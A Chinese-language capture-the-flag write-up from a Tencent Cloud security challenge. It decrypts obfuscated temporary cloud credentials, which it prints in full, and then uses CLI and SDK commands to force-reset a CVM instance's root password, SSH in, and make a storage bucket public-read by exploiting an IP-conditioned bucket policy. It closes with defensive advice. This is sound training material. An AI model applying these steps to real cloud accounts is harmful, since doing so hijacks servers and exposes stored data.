腾讯云安全挑战赛第一期Writeup：COS提权与利用技术分析<\/h1>

概述<\/h2>
本文基于腾讯云安全挑战赛第一期的实战题目，详细分析通过加密凭证获取、权限提升及云服务利用的全过程。题目涉及加密数据解密、临时密钥利用、云API操作及权限绕过技术，重点考察对腾讯云API及安全策略的理解。<\/p>

一、加密数据处理与解密<\/h2>

1.1 加密数据识别<\/h3>

提供的Python脚本包含以下核心组件：<\/p>

密钥<\/strong>：KEY = b"Lxnt1evByMdubwx9"<\/code><\/li>
加密数据<\/strong>：DATA<\/code>数组包含多个Base64编码的字符串<\/li>

解密方法<\/strong>：使用AES-ECB模式PKCS5填充解密<\/li> <\/ul> 1.2 解密脚本分析<\/h3> def<\/span> aes_ecb_pkcs5_decrypt<\/span>(b64s: str) -><\/span> str: <\/span><\/span> raw =<\/span> base64.<\/span>b64decode(b64s) <\/span><\/span> # 尝试使用pycryptodome库解密<\/span> <\/span><\/span> # 尝试使用cryptography库解密<\/span> <\/span><\/span> return<\/span> dec.<\/span>decode("utf-8"<\/span>, errors=<\/span>"replace"<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> deobfuscate_xor_from_b64<\/span>(s: str) -><\/span> str: <\/span><\/span> data =<\/span> base64.<\/span>b64decode(s) <\/span><\/span> data =<\/span> bytes(b ^<\/span> 0x23<\/span> for<\/span> b in<\/span> data) # XOR解密（密钥0x23）<\/span> <\/span><\/span> return<\/span> data.<\/span>decode("utf-8"<\/span>, errors=<\/span>"replace"<\/span>) <\/span><\/span><\/code><\/pre>1.3 解密结果<\/h3> 运行脚本后得到以下关键信息：<\/p> AccessKey (AK)<\/strong>：AKIDFG840k8ov09ZfQ6VdlfW-7Xpyyn0Uuak6bH_YS1CqANS0iZ995r00MAXrPhbEjVX<\/code><\/li> SecretKey (SK)<\/strong>：\/HihyTU6\/YmEf8nD1ujPZi8DthZiI7b+9eZKS76jpAg=<\/code><\/li> Session Token<\/strong>：长临时令牌（具体见原始数据）<\/li> <\/ul> 二、云API凭证配置<\/h2> 2.1 配置腾讯云CLI<\/h3> tccli configure <\/span><\/span># 依次输入AK、SK、区域（ap-guangzhou）、输出格式（json）<\/span> <\/span><\/span><\/code><\/pre>2.2 配置AWS CLI（兼容S3协议）<\/h3> # ~\/.aws\/config<\/span> <\/span><\/span>[<\/span>default]<\/span> <\/span><\/span>region =<\/span> ap-guangzhou <\/span><\/span>s3 =<\/span> <\/span><\/span> endpoint_url =<\/span> https:\/\/cos.ap-guangzhou.myqcloud.com <\/span><\/span> addressing_style =<\/span> virtual # 必须使用虚拟托管样式<\/span> <\/span><\/span> <\/span><\/span># ~\/.aws\/credentials<\/span> <\/span><\/span>[<\/span>default]<\/span> <\/span><\/span>aws_access_key_id =<\/span> AKIDrGuURY3ThyLSMqDsEv1ecnGSsRP0m0krNNUWUgTvqr_IitXJvmdelZq8dx5XEtt3 <\/span><\/span>aws_secret_access_key =<\/span> q9wsCzWhmEp3E\/DvDhld\/MMiuDo8yTn0shcpM7wBB1o=<\/span> <\/span><\/span>aws_session_token =<\/span> ukN1JfAFyFEJbyw3cdc5TTdUzPBhknna27c03053a861748506b924176014da27MuPprHAIl3oB2kxiKigKZ3oP1nsJz1BPLiljMlfGOSIlVWWb9uk_wtk1LKFaWPcJUJ44PxuPnc_f3dRc26dfmvJnOxgtmzdfjeZMsyq0iUbwcO1Be0_UlwREY9GPw4hvvUqdUkv6SJyb-6yVNoDA0hXnUBUgEKFRCGAJ7bs5_8tq_gok265jvp7Nes1NJ_ZEedEff4Tzd5iXb6Ix1ZSyGe4Yy4TJEcs2ixHvSXsCpqNLNSCR1JDSOG66GrfAqO0bC-uvsVrwva49kxchxWa_NR9cRaSoSumJE-N2siJ2pUZhDuqvNBUujkbHKo6Tqtg7Z8-mLjmfxZOY3HhJZOoR73Drqhpt6ILX4IcEuoNyOEQ9lkjg10lW_OoCKQmv__Iey6_9IqWYfIVgOwChCYGzhD-TrEHmjGickxNXzG3qKEez8YTWc973G7UhBplySXuq0oziGVjfWOxQ3MqocCTsyONWyZHsIo9RdnsZNuzvMFyR6JBgc-2l1r2p5hNunusTalPtZWsi0nBj3Co0ZRDe_OQqv6Xkbpn4eVgiryKLKwH4iTid2nCTBY9kDj0tS76_U_QVlLIK3zagu5xF3RR37Xy3BE_29q-XkbX8S0nNM1wwUAVO6L_zWUMUwaWu2UkDab1OXi-RV98a8N6bs9WCtA <\/span><\/span><\/code><\/pre> 三、权限探测与绕过<\/h2> 3.1 获取当前身份信息<\/h3> tccli sts GetCallerIdentity <\/span><\/span># 返回结果包含：<\/span> <\/span><\/span># - AccountId: 100026992078<\/span> <\/span><\/span># - UserId: 100043488407:challenge_01_xkeb6gd9n2ee<\/span> <\/span><\/span># - PrincipalId: 100043488407<\/span> <\/span><\/span><\/code><\/pre>3.2 分析Bucket策略<\/h3> aws s3api get-bucket-policy --bucket 21cf8bc7bq56-1313380398 \ <\/span><\/span><\/span><\/span> --endpoint-url http:\/\/cos.ap-guangzhou.myqcloud.com <\/span><\/span><\/code><\/pre>策略内容显示：<\/p> 拒绝操作<\/strong>：cos:PutBucketACL<\/code><\/li> 条件限制<\/strong>：IP不在43.138.212.54<\/code>或172.16.0.22<\/code>时拒绝<\/li> 主体<\/strong>：当前用户ID<\/li> <\/ul> 3.3 列举CVM实例<\/h3> 通过API列举当前账户下的云服务器实例，发现关键目标：<\/p> 实例ID<\/strong>：ins-hc0ktysk<\/code><\/li> 内网IP<\/strong>：172.16.0.22<\/code>（符合Bucket策略允许的IP）<\/li> 登录配置<\/strong>：未设置密码、未绑定密钥，默认用户root<\/code><\/li> <\/ul> 四、权限提升与利用<\/h2> 4.1 密码重置绕过<\/h3> 由于直接停止实例权限不足，使用腾讯云Python SDK强制重置密码：<\/p> from<\/span> tencentcloud.common.common_client import<\/span> CommonClient <\/span><\/span>from<\/span> tencentcloud.common import<\/span> credential <\/span><\/span> <\/span><\/span>cred =<\/span> credential.<\/span>Credential("AKID"<\/span>, "SK"<\/span>, "TOKEN"<\/span>) <\/span><\/span>params =<\/span> { <\/span><\/span> "InstanceIds"<\/span>: ["ins-hc0ktysk"<\/span>], <\/span><\/span> "Password"<\/span>: "Aa112211."<\/span>, # 设置新密码<\/span> <\/span><\/span> "UserName"<\/span>: "root"<\/span>, <\/span><\/span> "ForceStop"<\/span>: True<\/span> # 强制停止实例<\/span> <\/span><\/span>} <\/span><\/span>common_client =<\/span> CommonClient("cvm"<\/span>, "2017-03-12"<\/span>, cred, "ap-guangzhou"<\/span>) <\/span><\/span>common_client.<\/span>call_json("ResetInstancesPassword"<\/span>, params) <\/span><\/span><\/code><\/pre>4.2 登录目标实例<\/h3> 通过SSH登录获取控制权：<\/p> ssh root@119.29.168.151 # 使用重置后的密码<\/span> <\/span><\/span><\/code><\/pre>4.3 修改Bucket ACL<\/h3> 在授权IP环境下执行ACL修改：<\/p> aws s3api put-bucket-acl --bucket 21cf8bc7bq56-1313380398 \ <\/span><\/span><\/span><\/span> --acl public-read \ <\/span><\/span><\/span><\/span> --endpoint-url https:\/\/cos.ap-guangzhou.myqcloud.com <\/span><\/span><\/code><\/pre> 五、关键技术点总结<\/h2> 加密逆向<\/strong>：<\/p> AES-ECB模式Base64加密数据解密<\/li> XOR异或解码（0x23密钥）<\/li> <\/ul> <\/li> 云API利用<\/strong>：<\/p> 临时凭证的配置与验证<\/li> S3协议兼容性操作COS<\/li> <\/ul> <\/li> 权限绕过<\/strong>：<\/p> 利用IP条件策略的缺陷<\/li> 通过CVM实例作为跳板<\/li> <\/ul> <\/li> 提权技术<\/strong>：<\/p> 强制重置密码绕过权限限制<\/li> 利用内网IP满足策略条件<\/li> <\/ul> <\/li> <\/ol> 六、防御建议<\/h2> 临时凭证管理<\/strong>：<\/p> 限制临时密钥的作用范围和有效期<\/li> 避免在代码中硬编码密钥<\/li> <\/ul> <\/li> 权限最小化<\/strong>：<\/p> 遵循最小权限原则分配策略<\/li> 避免使用通配符资源路径<\/li> <\/ul> <\/li> 网络隔离<\/strong>：<\/p> 关键资源应限制在内网访问<\/li> 使用安全组和网络ACL限制IP<\/li> <\/ul> <\/li> 操作审计<\/strong>：<\/p> 启用CloudTrail或审计日志功能<\/li> 监控异常API调用行为<\/li> <\/ul> <\/li> <\/ol> 通过以上分析，该挑战赛题目全面覆盖了云安全中的密钥管理、权限控制和漏洞利用技术，对云安全防护体系建设具有重要参考价值。<\/p>